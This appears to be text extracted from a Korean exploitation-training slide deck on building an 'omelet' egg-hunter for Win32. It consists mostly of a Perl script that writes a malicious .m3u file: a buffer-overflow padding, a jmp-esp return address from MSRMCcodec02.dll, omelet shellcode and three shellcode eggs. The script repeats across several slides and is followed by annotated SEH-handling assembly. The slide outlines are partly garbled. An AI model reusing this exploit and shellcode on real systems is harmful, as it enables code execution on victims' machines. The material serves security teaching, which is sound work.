0x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x
40x40x40x40x40x40x40x40";
59. Track3. Exploitation How to made Omelet-Egg-Hunter ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
쉘코드를 에그로 변환
하나의 에그에 담을 수 있는 쉘 코드의 최대 크기는 127 bytes
Marker = 0xBADA55
omelet_code
// This is the binary code that needs to be executed to find the eggs,
// recombine the orignal shellcode and execute it. It is 82 bytes:
omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0C
x59xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5A
xE8xC7xFFxFFxFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x03x97xEBxDBx31xC0x64xFFx50x08";
// These are the eggs that need to be injected into the target process
// for the omelet shellcode to be able to recreate the original shellcode
// (you can insert them as many times as you want, as long as each one is
// inserted at least once). They are 127 bytes each:
egg0 = "x7AxFFx55xDAxBAx89xE2xDAxC1xD9x72xF4x58x50x59x49x49x49x49x43x43x43x43x43x43x51x5A
x56x54x58x33x30x56x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42x54x41x41x51x32x41x4
2x32x42x42x30x42x42x58x50x38x41x43x4Ax4Ax49x4Bx4Cx4Ax48x50x44x43x30x43x30x45x50x4Cx4B
x47x35x47x4Cx4Cx4Bx43x4Cx43x35x43x48x45x51x4Ax4Fx4Cx4Bx50x4Fx42x38x4Cx4Bx51x4F
x47x50x43x31x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43";
egg1 = "x7AxFEx55xDAxBAx31x4Ax4Ex50x31x49x50x4Cx59x4Ex4Cx4Cx44x49x50x43x44x43x37x49x51x49x5A
x44x4Dx43x31x49x52x4Ax4Bx4Ax54x47x4Bx51x44x46x44x43x34x42x55x4Bx55x4Cx4Bx51x4F
x51x34x45x51x4Ax4Bx42x46x4Cx4Bx44x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4Cx4Cx4B
x45x51x4Ax4Bx4Dx59x51x4Cx47x54x43x34x48x43x51x4Fx46x51x4Bx46x43x50x50x56x45x34x4Cx4B
x47x36x50x30x4Cx4Bx51x50x44x4Cx4Cx4Bx44x30x45";
egg2 = "x7AxFDx55xDAxBAx4Cx4Ex4Dx4Cx4Bx45x38x43x38x4Bx39x4Ax58x4Cx43x49x50x42x4A
x50x50x42x48x4Cx30x4Dx5Ax43x34x51x4Fx45x38x4Ax38x4Bx4Ex4Dx5Ax44x4Ex46x37x4Bx4Fx4D
x37x42x43x45x31x42x4C
x42x43x45x50x41x41x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x4
0x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x
40x40x40x40x40x40x40x40";
egg0
egg1
egg2
60. Track3. Exploitation How to made Omelet-Egg-Hunter ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
my $file= "OmeletEggHuntingExploit1.m3u";
my $junk= "A" x 26039;
my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll
my $padding = "x90" x 25;
my $garbage="This is a bunch of garbage" x 10;
my $omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2".
"xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0Cx59".
"xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08".
"x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5AxE8xC7xFFxFF".
"xFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x06x97xE9xD8".
"xFFxFFxFFx31xC0x64xFFx50x08";
my $egg1 = "x7AxFFx55xDAxBAx89xE2xDAxC1xD9x72xF4x58x50".
"x59x49x49x49x49x43x43x43x43x43x43x51x5Ax56x54x58x33".
"x30x56x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42".
"x41x41x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58".
"x50x38x41x43x4Ax4Ax49x4Bx4Cx4Ax48x50x44x43x30x43x30".
"x45x50x4Cx4Bx47x35x47x4Cx4Cx4Bx43x4Cx43x35x43x48x45".
"x51x4Ax4Fx4Cx4Bx50x4Fx42x38x4Cx4Bx51x4Fx47x50x43x31".
"x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43";
my $egg2 = "x7AxFEx55xDAxBAx31x4Ax4Ex50x31x49x50x4Cx59".
"x4Ex4Cx4Cx44x49x50x43x44x43x37x49x51x49x5Ax44x4Dx43".
"x31x49x52x4Ax4Bx4Ax54x47x4Bx51x44x46x44x43x34x42x55".
"x4Bx55x4Cx4Bx51x4Fx51x34x45x51x4Ax4Bx42x46x4Cx4Bx44".
"x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4C".
"x4Cx4Bx45x51x4Ax4Bx4Dx59x51x4Cx47x54x43x34x48x43x51".
"x4Fx46x51x4Bx46x43x50x50x56x45x34x4Cx4Bx47x36x50x30".
"x4Cx4Bx51x50x44x4Cx4Cx4Bx44x30x45";
my $egg3 = "x7AxFDx55xDAxBAx4Cx4Ex4Dx4Cx4Bx45x38x43x38".
"x4Bx39x4Ax58x4Cx43x49x50x42x4Ax50x50x42x48x4Cx30x4D".
"x5Ax43x34x51x4Fx45x38x4Ax38x4Bx4Ex4Dx5Ax44x4Ex46x37".
"x4Bx4Fx4Dx37x42x43x45x31x42x4Cx42x43x45x50x41x41x40".
"x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40".
"x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40".
"x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40".
"x40x40x40x40x40x40x40x40x40x40x40";
open($FILE,">$file");
print $FILE $junk.$eip.$padding.$omelet_code.$garbage.$egg1.$garbage.$egg2.$garbage.$egg3;
close($FILE);
print "m3u File Created successfullyn";
61. Track3. Exploitation How to made Omelet-Egg-Hunter ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
접근 위반 발생 (Access violation when reading [00000000]
62. Track3. Exploitation How to made Omelet-Egg-Hunter ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
w32_SEH_omelet.asm / shellcode Analysis
jump to shell code
my $file= "OmeletEggHuntingExploit1.m3u";
my $junk= "A" x 26039;
my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll
my $padding = "x90" x 25;
my $garbage="This is a bunch of garbage" x 10;
my $omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2".
"xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0Cx59".
"xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08".
"x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5AxE8xC7xFFxFF".
"xFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x06x97xE9xD8".
"xFFxFFxFFx31xC0x64xFFx50x08";
my $egg1 = "x7AxFFx55xDAxBAx89xE2xDAxC1xD9x72xF4x58x50".
"x59x49x49x49x49x43x43x43x43x43x43x51x5Ax56x54x58x33".
"x30x56x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42".
"x41x41x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58".
"x50x38x41x43x4Ax4Ax49x4Bx4Cx4Ax48x50x44x43x30x43x30".
"x45x50x4Cx4Bx47x35x47x4Cx4Cx4Bx43x4Cx43x35x43x48x45".
"x51x4Ax4Fx4Cx4Bx50x4Fx42x38x4Cx4Bx51x4Fx47x50x43x31".
"x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43";
my $egg2 = "x7AxFEx55xDAxBAx31x4Ax4Ex50x31x49x50x4Cx59".
"x4Ex4Cx4Cx44x49x50x43x44x43x37x49x51x49x5Ax44x4Dx43".
"x31x49x52x4Ax4Bx4Ax54x47x4Bx51x44x46x44x43x34x42x55".
"x4Bx55x4Cx4Bx51x4Fx51x34x45x51x4Ax4Bx42x46x4Cx4Bx44".
"x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4C".
"x4Cx4Bx45x51x4Ax4Bx4Dx59x51x4Cx47x54x43x34x48x43x51".
"x4Fx46x51x4Bx46x43x50x50x56x45x34x4Cx4Bx47x36x50x30".
"x4Cx4Bx51x50x44x4Cx4Cx4Bx44x30x45";
my $egg3 = "x7AxFDx55xDAxBAx4Cx4Ex4Dx4Cx4Bx45x38x43x38".
"x4Bx39x4Ax58x4Cx43x49x50x42x4Ax50x50x42x48x4Cx30x4D".
"x5Ax43x34x51x4Fx45x38x4Ax38x4Bx4Ex4Dx5Ax44x4Ex46x37".
"x4Bx4Fx4Dx37x42x43x45x31x42x4Cx42x43x45x50x41x41x40".
"x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40".
"x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40".
"x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40".
"x40x40x40x40x40x40x40x40x40x40x40";
omit…
63. Track3. Exploitation How to made Omelet-Egg-Hunter ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
w32_SEH_omelet.asm / shellcode Analysis
my $file= "OmeletEggHuntingExploit1.m3u";
my $junk= "A" x 26039;
my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll
my $padding = "x90" x 25;
my $garbage="This is a bunch of garbage" x 10;
my $omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2".
"xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0Cx59".
"xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08".
"x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5AxE8xC7xFFxFF".
"xFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x06x97xE9xD8".
"xFFxFFxFFx31xC0x64xFFx50x08";
my $egg1 = "x7AxFFx55xDAxBAx89xE2xDAxC1xD9x72xF4x58x50".
"x59x49x49x49x49x43x43x43x43x43x43x51x5Ax56x54x58x33".
"x30x56x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42".
"x41x41x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58".
"x50x38x41x43x4Ax4Ax49x4Bx4Cx4Ax48x50x44x43x30x43x30".
"x45x50x4Cx4Bx47x35x47x4Cx4Cx4Bx43x4Cx43x35x43x48x45".
"x51x4Ax4Fx4Cx4Bx50x4Fx42x38x4Cx4Bx51x4Fx47x50x43x31".
"x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43";
my $egg2 = "x7AxFEx55xDAxBAx31x4Ax4Ex50x31x49x50x4Cx59".
"x4Ex4Cx4Cx44x49x50x43x44x43x37x49x51x49x5Ax44x4Dx43".
"x31x49x52x4Ax4Bx4Ax54x47x4Bx51x44x46x44x43x34x42x55".
"x4Bx55x4Cx4Bx51x4Fx51x34x45x51x4Ax4Bx42x46x4Cx4Bx44".
"x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4C".
"x4Cx4Bx45x51x4Ax4Bx4Dx59x51x4Cx47x54x43x34x48x43x51".
"x4Fx46x51x4Bx46x43x50x50x56x45x34x4Cx4Bx47x36x50x30".
"x4Cx4Bx51x50x44x4Cx4Cx4Bx44x30x45";
my $egg3 = "x7AxFDx55xDAxBAx4Cx4Ex4Dx4Cx4Bx45x38x43x38".
"x4Bx39x4Ax58x4Cx43x49x50x42x4Ax50x50x42x48x4Cx30x4D".
"x5Ax43x34x51x4Fx45x38x4Ax38x4Bx4Ex4Dx5Ax44x4Ex46x37".
"x4Bx4Fx4Dx37x42x43x45x31x42x4Cx42x43x45x50x41x41x40".
"x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40".
"x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40".
"x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40".
"x40x40x40x40x40x40x40x40x40x40x40";
omit…
for nop sled
omelet code for finding eggs
64. Track3. Exploitation How to made Omelet-Egg-Hunter ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
w32_SEH_omelet.asm / shellcode Analysis
my $file= "OmeletEggHuntingExploit1.m3u";
my $junk= "A" x 26039;
my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll
my $padding = "x90" x 25;
my $garbage="This is a bunch of garbage" x 10;
my $omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2".
"xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0Cx59".
"xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08".
"x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5AxE8xC7xFFxFF".
"xFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x06x97xE9xD8".
"xFFxFFxFFx31xC0x64xFFx50x08";
my $egg1 = "x7AxFFx55xDAxBAx89xE2xDAxC1xD9x72xF4x58x50".
"x59x49x49x49x49x43x43x43x43x43x43x51x5Ax56x54x58x33".
"x30x56x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42".
"x41x41x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58".
"x50x38x41x43x4Ax4Ax49x4Bx4Cx4Ax48x50x44x43x30x43x30".
"x45x50x4Cx4Bx47x35x47x4Cx4Cx4Bx43x4Cx43x35x43x48x45".
"x51x4Ax4Fx4Cx4Bx50x4Fx42x38x4Cx4Bx51x4Fx47x50x43x31".
"x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43";
my $egg2 = "x7AxFEx55xDAxBAx31x4Ax4Ex50x31x49x50x4Cx59".
"x4Ex4Cx4Cx44x49x50x43x44x43x37x49x51x49x5Ax44x4Dx43".
"x31x49x52x4Ax4Bx4Ax54x47x4Bx51x44x46x44x43x34x42x55".
"x4Bx55x4Cx4Bx51x4Fx51x34x45x51x4Ax4Bx42x46x4Cx4Bx44".
"x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4C".
"x4Cx4Bx45x51x4Ax4Bx4Dx59x51x4Cx47x54x43x34x48x43x51".
"x4Fx46x51x4Bx46x43x50x50x56x45x34x4Cx4Bx47x36x50x30".
"x4Cx4Bx51x50x44x4Cx4Cx4Bx44x30x45";
my $egg3 = "x7AxFDx55xDAxBAx4Cx4Ex4Dx4Cx4Bx45x38x43x38".
"x4Bx39x4Ax58x4Cx43x49x50x42x4Ax50x50x42x48x4Cx30x4D".
"x5Ax43x34x51x4Fx45x38x4Ax38x4Bx4Ex4Dx5Ax44x4Ex46x37".
"x4Bx4Fx4Dx37x42x43x45x31x42x4Cx42x43x45x50x41x41x40".
"x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40".
"x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40".
"x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40".
"x40x40x40x40x40x40x40x40x40x40x40";
EDI → 0x00000000
omit…
for nop sled
omelet code for finding eggs
65. start:
XOR EDI, EDI
jmp SHORT reset_stack
create_SEH_handler:
EDI → 0x00000000
PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF
MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0]
CLD ; SCAN memory upwards from 0
scan_loop:
MOV AL, egg_size ; EAX = egg_size
egg_size_location equ $-1 - $$
Access Violation
REPNE SCASB ; Find the first byte
PUSH EAX ; Save egg_size
MOV ESI, EDI
LODSD ; EAX = II M2 M3 M4
XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index
marker_bytes_location equ $-3 - $$
CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index
max_index_location equ $-1 - $$
JA reset_stack ; No -> This was not a marker, continue scanning
POP ECX ; ECX = egg_size
IMUL ECX ; EAX = egg_size * egg_index == egg_offset
; EDX = 0 because ECX * EAX is always less than 0x1,000,000
ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
XCHG EAX, EDI
copy_loop:
REP MOVSB ; copy egg to basket
MOV EDI, ESI ; EDI = end of egg
reset_stack:
; Reset the stack to prevent problems cause by recursive SEH handlers and set
; ourselves up to handle and AVs we may cause by scanning memory:
XOR EAX, EAX ; EAX = 0
MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X]
find_last_SEH_loop:
MOV ESP, ECX ; ESP = SEH_frames[X]
POP ECX ; EBX = SEH_frames[X].next_frame
CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ?
JNE find_last_SEH_loop ; No "X -= 1", check next frame
POP EDX ; EDX = SEH_frames[0].handler
CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler
SEH_handler:
POPA ; ESI = [ESP + 4] -> struct exception_info
LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address
POP EAX ; EAX = exception address 0x????????
OR AX, 0xFFF ; EAX = 0x?????FFF
INC EAX ; EAX = 0x?????FFF + 1 -> next page
JS done ; EAX > 0x7FFFFFFF ===> done
XCHG EAX, EDI ; EDI => next page
JMP reset_stack
done:
XOR EAX, EAX ; EAX = 0
CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.